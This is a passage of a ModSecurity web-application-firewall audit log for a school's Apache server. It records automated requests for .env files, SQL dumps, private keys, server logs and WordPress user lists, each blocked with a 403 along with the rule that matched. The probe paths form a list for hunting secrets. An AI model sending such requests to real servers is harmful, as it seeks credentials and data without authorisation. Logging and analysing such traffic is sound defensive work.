Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --278ec20f-Z-- --4bbefa70-A-- [28/May/2025:23:16:08 +0700] aDc2yBwBHP_x2VCWa06lVgAAAM4 103.236.140.4 56918 103.236.140.4 8181 --4bbefa70-B-- GET /myproject/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --4bbefa70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4bbefa70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448968385330 659 (- - -) Stopwatch2: 1748448968385330 659; combined=248, p1=216, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bbefa70-Z-- --357b8207-A-- [28/May/2025:23:16:08 +0700] aDc2yBwBHP_x2VCWa06lWAAAAM8 103.236.140.4 56924 103.236.140.4 8181 --357b8207-B-- GET /.envs/.production/.django HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --357b8207-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --357b8207-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448968569393 659 (- - -) Stopwatch2: 1748448968569393 659; combined=244, p1=218, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --357b8207-Z-- --e02f3600-A-- [28/May/2025:23:16:08 +0700] aDc2yBwBHP_x2VCWa06lWQAAANI 103.236.140.4 56926 103.236.140.4 8181 --e02f3600-B-- GET /react-app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --e02f3600-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e02f3600-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448968753701 855 (- - -) Stopwatch2: 1748448968753701 855; combined=326, p1=287, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e02f3600-Z-- --2d203138-A-- [28/May/2025:23:16:09 +0700] aDc2yRwBHP_x2VCWa06lXAAAAMs 103.236.140.4 56934 103.236.140.4 8181 --2d203138-B-- GET /react-app/.env.production HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2d203138-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d203138-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448969001193 892 (- - -) Stopwatch2: 1748448969001193 892; combined=332, p1=295, p2=0, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d203138-Z-- --c3b0d335-A-- [28/May/2025:23:16:11 +0700] aDc2yxwBHP_x2VCWa06lZgAAANU 103.236.140.4 56958 103.236.140.4 8181 --c3b0d335-B-- GET /.gitignore HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --c3b0d335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3b0d335-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.gitignore" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448971239383 683 (- - -) Stopwatch2: 1748448971239383 683; combined=256, p1=228, p2=0, p3=0, p4=0, p5=27, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3b0d335-Z-- --965b6805-A-- [28/May/2025:23:16:13 +0700] aDc2zRwBHP_x2VCWa06lbAAAANg 103.236.140.4 56970 103.236.140.4 8181 --965b6805-B-- GET /db_backup.sql HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --965b6805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --965b6805-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448973091182 1632 (- - -) Stopwatch2: 1748448973091182 1632; combined=712, p1=325, p2=360, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --965b6805-Z-- --41a0956f-A-- [28/May/2025:23:16:13 +0700] aDc2zRwBHP_x2VCWa06lbQAAANE 103.236.140.4 56972 103.236.140.4 8181 --41a0956f-B-- GET /dump.sql HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --41a0956f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41a0956f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448973276627 1480 (- - -) Stopwatch2: 1748448973276627 1480; combined=597, p1=300, p2=270, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41a0956f-Z-- --fc5d8e65-A-- [28/May/2025:23:16:15 +0700] aDc2zxwBHP_x2VCWa06legAAANg 103.236.140.4 57000 103.236.140.4 8181 --fc5d8e65-B-- GET /uploads/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --fc5d8e65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc5d8e65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448975954735 639 (- - -) Stopwatch2: 1748448975954735 639; combined=240, p1=214, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc5d8e65-Z-- --f005e318-A-- [28/May/2025:23:16:17 +0700] aDc20RwBHP_x2VCWa06lhAAAAMA 103.236.140.4 57020 103.236.140.4 8181 --f005e318-B-- GET /private.key HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f005e318-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f005e318-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448977814621 1690 (- - -) Stopwatch2: 1748448977814621 1690; combined=623, p1=299, p2=292, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f005e318-Z-- --67b3d561-A-- [28/May/2025:23:16:18 +0700] aDc20RwBHP_x2VCWa06lhQAAANc 103.236.140.4 57022 103.236.140.4 8181 --67b3d561-B-- GET /public.key HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --67b3d561-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67b3d561-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448977999809 1477 (- - -) Stopwatch2: 1748448977999809 1477; combined=589, p1=293, p2=269, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67b3d561-Z-- --451b3b53-A-- [28/May/2025:23:16:18 +0700] aDc20hwBHP_x2VCWa06ligAAAME 103.236.140.4 57032 103.236.140.4 8181 --451b3b53-B-- GET /.env.testing HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --451b3b53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --451b3b53-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448978929292 647 (- - -) Stopwatch2: 1748448978929292 647; combined=244, p1=212, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --451b3b53-Z-- --93bb6f18-A-- [28/May/2025:23:16:19 +0700] aDc20xwBHP_x2VCWa06liwAAAMI 103.236.140.4 57034 103.236.140.4 8181 --93bb6f18-B-- GET /.env.staging HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --93bb6f18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93bb6f18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448979113541 621 (- - -) Stopwatch2: 1748448979113541 621; combined=240, p1=213, p2=0, p3=0, p4=0, p5=27, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93bb6f18-Z-- --54ec8173-A-- [28/May/2025:23:16:19 +0700] aDc20xwBHP_x2VCWa06ljAAAAMk 103.236.140.4 57036 103.236.140.4 8181 --54ec8173-B-- GET /.env.dev HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --54ec8173-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54ec8173-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448979297562 619 (- - -) Stopwatch2: 1748448979297562 619; combined=240, p1=214, p2=0, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54ec8173-Z-- --36a26b74-A-- [28/May/2025:23:16:19 +0700] aDc20xwBHP_x2VCWa06ljQAAAMM 103.236.140.4 57038 103.236.140.4 8181 --36a26b74-B-- GET /.env.backup HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --36a26b74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36a26b74-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448979481682 653 (- - -) Stopwatch2: 1748448979481682 653; combined=250, p1=224, p2=0, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36a26b74-Z-- --f905d566-A-- [28/May/2025:23:16:20 +0700] aDc21A3r-0gDryHAyD_pqwAAAFc 103.236.140.4 57046 103.236.140.4 8181 --f905d566-B-- GET /var/log/nginx/access.log HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f905d566-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f905d566-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448980224581 1543 (- - -) Stopwatch2: 1748448980224581 1543; combined=644, p1=305, p2=312, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f905d566-Z-- --ea510161-A-- [28/May/2025:23:16:20 +0700] aDc21A3r-0gDryHAyD_prAAAAEo 103.236.140.4 57048 103.236.140.4 8181 --ea510161-B-- GET /var/log/nginx/error.log HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --ea510161-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea510161-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448980409558 1513 (- - -) Stopwatch2: 1748448980409558 1513; combined=618, p1=307, p2=285, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea510161-Z-- --0bbb1a15-A-- [28/May/2025:23:16:20 +0700] aDc21BwBHP_x2VCWa06ljwAAAMo 103.236.140.4 57050 103.236.140.4 8181 --0bbb1a15-B-- GET /var/log/apache2/access.log HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0bbb1a15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bbb1a15-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448980594563 1549 (- - -) Stopwatch2: 1748448980594563 1549; combined=644, p1=311, p2=307, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bbb1a15-Z-- --a8d6a21f-A-- [28/May/2025:23:16:20 +0700] aDc21A3r-0gDryHAyD_prQAAAFY 103.236.140.4 57052 103.236.140.4 8181 --a8d6a21f-B-- GET /var/log/apache2/error.log HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a8d6a21f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8d6a21f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448980779567 1568 (- - -) Stopwatch2: 1748448980779567 1568; combined=657, p1=324, p2=305, p3=0, p4=0, p5=27, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8d6a21f-Z-- --2b9e7823-A-- [28/May/2025:23:51:29 +0700] aDc_EQ3r-0gDryHAyD_sPgAAAE0 103.236.140.4 38278 103.236.140.4 8181 --2b9e7823-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.236.193.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.236.193.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2b9e7823-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b9e7823-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 